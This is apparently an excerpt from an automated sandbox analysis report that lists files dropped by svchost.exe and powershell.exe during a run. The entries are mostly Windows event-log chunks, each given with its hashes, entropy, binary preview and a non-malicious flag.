                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:modified
                                                                              Size (bytes):4680
                                                                              Entropy (8bit):3.71089105613399
                                                                              Encrypted:false
                                                                              SSDEEP:96:pYMguQII4i546h4aGdinipV9ll7UY5HAmzQ+:9A4i/xne7HO+
                                                                              MD5:D4EE2FEE0CAA590CB6CE9C7A24792B0E
                                                                              SHA1:3A7810748C7E1BC45DA8020E3595EB6EEE86E63A
                                                                              SHA-256:DF3CCEF56BEFA71A015CCE3F704C4618FADBCA8F89C439B1D960FB77A9B60FBF
                                                                              SHA-512:033E00B6CAA58E746AC441B80672E0674A725B3556289B1044CCC51F98DEA6794A4EA96F0D2026A2C79CBDBD8F53B67861B9D4791393F7E25C2E43854A1B4FAD
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1079756391222424
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul0ll/lZ:NllUcl/
                                                                              MD5:C296B0C35354DD06C955237718AAC40C
                                                                              SHA1:DCE0F8D35974AA0AB49353CD949F2DD8F54B25FF
                                                                              SHA-256:A6D63E2AE04A32B3609B7886FBF4D1E0D37B6293C1E8CF6415FED4B76001FC8D
                                                                              SHA-512:1AEB19BF2D0C32B0E7ED32614AB1C0A263629D1D0967EAA4B6BFA6FCD81BCE0D0DCCCD596427880FCBC34D1911835FBD7364AE4002EDDCDA4BF63C66F42B7F75
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                                                              Category:dropped
                                                                              Size (bytes):3680
                                                                              Entropy (8bit):3.976453520664781
                                                                              Encrypted:false
                                                                              SSDEEP:48:MLUBrP+yXCrPwfFRVEfWb3/Ooc07YytxsiDC39SqdrSDFDS0UDEOH:JtCrup/vOocaheiDCNjoFsJ
                                                                              MD5:A0CE04676DC4823E9F37FE61DA2A71EE
                                                                              SHA1:40C6D47D3DA6F2575223B094D40085734BA50964
                                                                              SHA-256:38015AC7E35374530D63205D10FB09719D7B1CBDE903005C184F33661B0F082B
                                                                              SHA-512:DC1820E33C3B18D95D1B18330F54B128F148B1DDE857EC42287FCDE2B398004D6219154B9AC24BFBB509D4B81C2C7C696A1F74B50271B7F0204B0B22F53C4698
                                                                              Malicious:false
                                                                              Preview:ElfChnk.................d.......f...........P...`.....\....................................................................../%.............................................=...........................................................................................................................g...............@...........................n...................M...]...........................j...............................&.......................................................................~...............**..X...d........L...^..........&.........}.]..+..$.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.038021459059496
                                                                              Encrypted:false
                                                                              SSDEEP:768:PVUHiapX7xadptrDT9W84bW664k5Xyvk:OHi6xadptrX9WPbR
                                                                              MD5:56B9A271179BF003083C8002C7F5A875
                                                                              SHA1:69E0E10B48EB41FD650F3C9BAE65D49F27ADB313
                                                                              SHA-256:30512EBF0889D3AC4CE2612E994843DF72F0B48D24561B0E8FDF44ED199A2AF7
                                                                              SHA-512:0F6FDBC34E40413FA31E1CE1FCBE526434236213CEF3D5D5DE3205DD81A405CCD910DEBF533927302A08A17B71E03F0DEA9214F763BDA012C7FA0617BDF0A2AF
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........P...............P...........`.......Cr`w......................................................................0`................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.4013147639327475
                                                                              Encrypted:false
                                                                              SSDEEP:384:FhGN+3N6sNSNYNLNjNUSNbN6NHNRNbNYN0NsNZN7NhNLNPNhN8NdNixNAwNioNZs:FGvsbF1QBjr1xCKuL48fpoQ
                                                                              MD5:D352D15D6A29EC818FCCB7D131D827B4
                                                                              SHA1:E83944244EF8A5B84B6A8DF486A5A5801937ED51
                                                                              SHA-256:B57978A9C8C8B8D8DF2EC5AAE442504C7327951A2602CD8322378EB9E6AC0D57
                                                                              SHA-512:CF9CDEAE9F69A19E36214B4C29D9C319B231675CD5B4B3A7BAC8F1EE23FFDB06E8E4188E0309A2B710EA1AC8948F72ED4EC7CA8209FA7C0255E1C3BA4614E959
                                                                              Malicious:false
                                                                              Preview:ElfChnk............................................lK..........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F....................C.......................J...............................................................i...................F......e...........**..............."s...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):115472
                                                                              Entropy (8bit):4.291605729126609
                                                                              Encrypted:false
                                                                              SSDEEP:384:VV+VHJVrVaV+VLVZVChsVPVUVvVoVTVXV8VMVxVIVyV5JVYV6VCiVfV5V/VBVAVw:SOI1iRI1iQ
                                                                              MD5:6DCFAC0CF1D2A8EB54C31C981F0AA766
                                                                              SHA1:5FFC0C5E7D30ED1470F2920C7575D497F8D88142
                                                                              SHA-256:FA03CE991B7F9B3CA443672E4C92DAFDCD52522C524AA6203A2EE39A44890EDF
                                                                              SHA-512:BF2B8A97113939233B5BAFF8CE7BC73229BABF04DE50E8FF422EE63DE793914830256F4A7998E8AB40103BE742F0495388382D6CC38E5D7CB4C2336F5A8BD14B
                                                                              Malicious:false
                                                                              Preview:ElfChnk.i...............i...................H.......p.C6....................................................................T1..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F....................................................3.......................................................8..........................&...Y1......**..............8..r..........F..&...............................................................@.......X...w.!.....E..........@8..r.................................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........d...m.i.c.r.o.s.o.f.t...w.i.n.d.o.w.s.c.o.m.m.u.n.i.c.a.t.i.o.n.s.a.p.p.s._.8.w.e.k.y.b.3.d.8.b.b.w.e.....n.d.o....**......
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.423265177202914
                                                                              Encrypted:false
                                                                              SSDEEP:384:67UhsmYDQlm9cKrRtUmNmHumtTmgm5wQXvZ7bmO8mfQE3mq9mqmxqm6nFmCWmnsn:XMrJcWHvqisqnvokZRKeTSPnSKn
                                                                              MD5:34B35A683C68A73A1BF569F68E54DB0D
                                                                              SHA1:FC5C102CFE726B21653E768ADA9A275FADA90550
                                                                              SHA-256:82203A8B2AF5D6CF60E99ADA87DF17CED01A954F995B6649E26E1C08FB97BEC9
                                                                              SHA-512:E547B36385DBFBAF0D825AE5475C3CEF0B1949E632402D94385794F1AA1A8A565738FA29C4F895894DB61B86CE7F29DF2D389CFF63D9D246AE5157BAB20DABB1
                                                                              Malicious:false
                                                                              Preview:ElfChnk..0.......0.......0.......0..........x...X...iS.~........................................................................................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...................................C\..........................................KJ...............H..;d.......X..............#...........%...........**.......0....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 4, DIRTY
                                                                              Category:dropped
                                                                              Size (bytes):70680
                                                                              Entropy (8bit):0.7976496829237599
                                                                              Encrypted:false
                                                                              SSDEEP:384:PxhpiMLe8XiCtViyiLhpiMLe8XiCtViyi:ZPpoPp
                                                                              MD5:EE9C64BA3669517760F6702E9F294B91
                                                                              SHA1:5B39471353F5941573B4E135E4CDFA236504B3D6
                                                                              SHA-256:57F292FACF1B6C7548D9350B2C319BE1CC6810BB03290E5FCB1FE662E3EC9830
                                                                              SHA-512:923BF3711E6146B67E56F509BEFB494E90FD5F5C03F929BAE5FEF6E68C5AD624F60737C9E15220BB076ABBC71DB49911BC0D50B25B5F47255D9DA37F5638DD7D
                                                                              Malicious:false
                                                                              Preview:ElfFile.........................................................................................................................ElfChnk.....................................P.......o........................................................................}w.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.416807332891786
                                                                              Encrypted:false
                                                                              SSDEEP:1536:CbBN2A4VD7VAx8whAGU2woJQghgooKChi581UAkM:
                                                                              MD5:8B93FFD74BA69D506BC1A7CA93434764
                                                                              SHA1:8275F283E3EB6143F33D1B97C889D167963A9B41
                                                                              SHA-256:9D1B6EA5CF8330CB2CE526B709669FCF7BD756EE43E30230B98F3FBE6B80D227
                                                                              SHA-512:8EED6493C2C3B9BD2B0DB0ECF80B6FFCC007A1BB618725BC5681469894965CE2606589062BA941C6B29D23F9A5F46EE9613F2FA46AC0B587CB6130EA99E24A15
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........b...............b...............@...........................................................................Z!H.............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.519960906808938
                                                                              Encrypted:false
                                                                              SSDEEP:768:7PB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9ZFN9NxKk:vXY5nVYIyyqED5BVZUeJ+EsiA881rXT
                                                                              MD5:F2DD657C9A1CB9C4DE1DF89C0F45E5F1
                                                                              SHA1:A9B48C4B4F004BE9F9641753D4BAEADD209BC4EF
                                                                              SHA-256:7601EB81F47B9DFC18BAD436F6657EBFD07782F6C8BC681A76DEFC69C6104613
                                                                              SHA-512:C226D4C11D55C8BA887F2A6314B2C797CA60A12B90C066E7929E0CF182440D3E246C9399D4118FD5E781C7998A85E78AEF363D54D68DA86E39BF6D9F07DA6441
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........|...............|...................%DkZ........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y...........>...........**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):99568
                                                                              Entropy (8bit):2.311841400931602
                                                                              Encrypted:false
                                                                              SSDEEP:384:aosKgoxhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorDorrTo9orForV:RDCpCDCpr2
                                                                              MD5:48487F6F6DCF6ECF60B5EFC6808C64DC
                                                                              SHA1:F4BD3738C39FD821B317D0AF8D9B138D98280A5E
                                                                              SHA-256:E175C5C87262B0B5A74449EFC93597E49E192978FE83869880F08A8BB49A631B
                                                                              SHA-512:6214F9B0BDDE6E52B167A0934E29177698FED25A013AFC6A636BE66F7DCECBBBD1B9D46881FD48CD8704108B3C6149232CE15696539E88CBBE49246BCCCF7DB5
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................+...-..X.......................................................................{.K................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................U)..............................**..............*+..^........F..................................................................>.......V...X.!..e..............*+..^...............................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8512934663046342
                                                                              Encrypted:false
                                                                              SSDEEP:384:vhAiPA5PNPxPEPHPhPEPmPSPRP3PoP1P0mPQP1P9xP:v2Nz
                                                                              MD5:B58E72BD85CF367466349FADCF9A5818
                                                                              SHA1:0F561886DC1FC8FBCA5DC8CA10DB1A7C34CEE419
                                                                              SHA-256:D6F533FC5273A6E86F4295EE8935D94CC1A1CCD12A0DCA9C6C9723F852772861
                                                                              SHA-512:32893F184EE6EA667D4FA98625F5B0192256F05E072513D2F68C3078FA2002824DB743BF759C5DEF4EBFD92D4257E5EE06FF584D0F4A79D8A964FA2C65CFCA01
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................%...&.........................................................................p4..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8432260898567245
                                                                              Encrypted:false
                                                                              SSDEEP:384:hhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lD:hWXSYieD+tvgzmMvG5m2a0
                                                                              MD5:9BCAC131A0E1046D07A1126509C0163B
                                                                              SHA1:668C02B1F04155FC7C86DA0FD801AB8512D8E647
                                                                              SHA-256:A069A8295BD4D219C7E117748EC00A8CE85C3AD2F84991B77311E865DA012C90
                                                                              SHA-512:11CECFB1CC6FB52B75BBEADCB99337634B61B1D4B78514905846BC0D6F57704EFDD01E59177C0A843FB8346DF2AEF6FF00315D1597E526F4408368A0834B4E90
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................$...&............................................................................W................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................&...........**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.0648786474735816
                                                                              Encrypted:false
                                                                              SSDEEP:384:uhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28k:ubCyhLfISid
                                                                              MD5:B43482B6E0A6F0C98F6F1FD45D135CCA
                                                                              SHA1:7D866A9F6AA0E8147BCE219760299CFA892CFF66
                                                                              SHA-256:9DABDEE7135BC748B38B7D769B1A33DC06E3A7FB4783E7F2ADC5FB84774C84C3
                                                                              SHA-512:F8F4B12FBE4EB7C49FD16DC53F428CB1B36A4C64C6288254DB1EE2F9D9AD1DA82097F3B8EE335BF812671DA9976718A79025AC5B08A52116BD5FB8046C772C6E
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........J...............J...............`...uk......................................................................k..b................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n............................................................................v..........**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.2717996314210374
                                                                              Encrypted:false
                                                                              SSDEEP:768:NcMhFBuyKskZljdoKXjtT/r18rQXn8iLqa3:eMhFBuV
                                                                              MD5:C60BBFAFCE737B77BEE93705B85ED648
                                                                              SHA1:10F8D852CE8404B6B6D875C22618BBA690A864C3
                                                                              SHA-256:551A780C4C1734FDBD0FA1A01BBC51193DC1230FE3A4ABDA3E4B75E8CE511DEE
                                                                              SHA-512:AE2F31F30563DC72FC3E8BBBD63301218FC59A50A20856018463AB0584B8921C4836E20578F43724692A1CE74C3369F8B874C3E7D868C12D3C424A0407F24E8A
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........K...............K....................RE....................................................................7f..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.896745651566555
                                                                              Encrypted:false
                                                                              SSDEEP:768:nre2Q+uYvAzBCBao/F6Cf2SEqEhwaK41HZaWRSgELNnLi:WHf
                                                                              MD5:396196233DA144BC9B1AC36AEBA3FA42
                                                                              SHA1:B5800B9F323B93BCBCFA9D2F727A9975CACD6337
                                                                              SHA-256:4A268F50173502D662F85D13944A1249B58912BCD3BC9FA6B419CB1E561D2969
                                                                              SHA-512:A0C83A765A92F558C0BBD72D418D6C8A2AB26F90A71DA6B5342C1AC98E3BB3AC0A57E6DBA86AB7334276A0058863364C36D8205EEBEAF1B29B411860DA528F61
                                                                              Malicious:false
                                                                              Preview:ElfChnk.v.......x.......v.......x...........P...`...d........................................................................X.e........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..@...v.......<..:..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.924636023538134
                                                                              Encrypted:false
                                                                              SSDEEP:384:wh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDx:wMAP1Qa5AgfQQn
                                                                              MD5:8EC9027553BC6E0AA226CBE3AA9AEC1A
                                                                              SHA1:3E261D8E27902EB9EEF0333F5716E2298FE8FA55
                                                                              SHA-256:A2261A47F8E8D6F1E200968E7080400155424C4DD140F281C48FEACD0017A010
                                                                              SHA-512:859C59B36EFF5DCEBD329ABED2952EE5ECE6B4D5A8918C341878E77ABEC82C6B2CA0F7392E5DF79C30A004ECF82664DBA87381739F55FC7D6547AC84DDA1BA65
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................0_..0b.............................................................................o................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&..............;....................R..........**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.4435307576303655
                                                                              Encrypted:false
                                                                              SSDEEP:384:3hBE0EGEq0EJE9EdEmE0S4E9/8OaExy4vEeE0TEVzEfEm/8E3VEQEoEwDEfEtEMZ:35SWOQRjEHgl4iYlz
                                                                              MD5:A8DA15633D80829F32A3E0CD50CFD995
                                                                              SHA1:CD4DD833ED62AD6DEE8A4B109A0356075CCDB8EC
                                                                              SHA-256:30BF357C2ADCC24F1A1A48EA85302CB33B8993899685FFFFDC13CD2E4A15C05F
                                                                              SHA-512:C7D808E257302F4D08623CE5C5A8D622CE946ADAA2543EE97A1AD3759CF11F93FAAFC8D786CDD4B32A1CBC1E97D5472A30B2A1EBADD5014F7F11BF2B92F1EA8B
                                                                              Malicious:false
                                                                              Preview:ElfChnk.s...............s...................@.......N...........................................................................................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F....................@...............>... ..E....................$...........(...&.......".......................F...........D...............Q......**......s....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.3316790418382953
                                                                              Encrypted:false
                                                                              SSDEEP:384:ahYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl/:a1T4hy3V3
                                                                              MD5:F7D62B056AB8FE4B83092B05915DD92A
                                                                              SHA1:7310B87EC20943EE7854A907C4F807D04D148ABF
                                                                              SHA-256:337F9831E9B639FC1523A9EBBDBA186A13D82AF929262CCA31F9FE0677B18E4A
                                                                              SHA-512:23FA4D0C18EFC32B8D0A7E5472973DFE557BC793E1BA38468CF5760561700FC1F7965B5A231F76D277B49E5B5E381F8773ED88E6B472CFAC78D5332A495F33ED
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........m...............m...........@.......r9{.....................................................................g..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../...........n...........**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.4485744286205566
                                                                              Encrypted:false
                                                                              SSDEEP:384:GhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfi:GzSKEqsMuy645tZtPN
                                                                              MD5:4572B4ADCED1EA2335588876D2A4AF20
                                                                              SHA1:0F16E0FF89200599B7DB688563F2E6B656ECFD4B
                                                                              SHA-256:68B18DB8939820C2E1E49267F4DA6D5F9EEBECF40A43BE0DEE1643D96CD5FE4C
                                                                              SHA-512:6D9E98838FEE3DB11033784CA8A912608F7814D2353C14C839BC372CE4EBF0AC9D05984EA3FE0B153062BAE55CB850277100569B37ED1B798CCDCA1E7746AD57
                                                                              Malicious:false
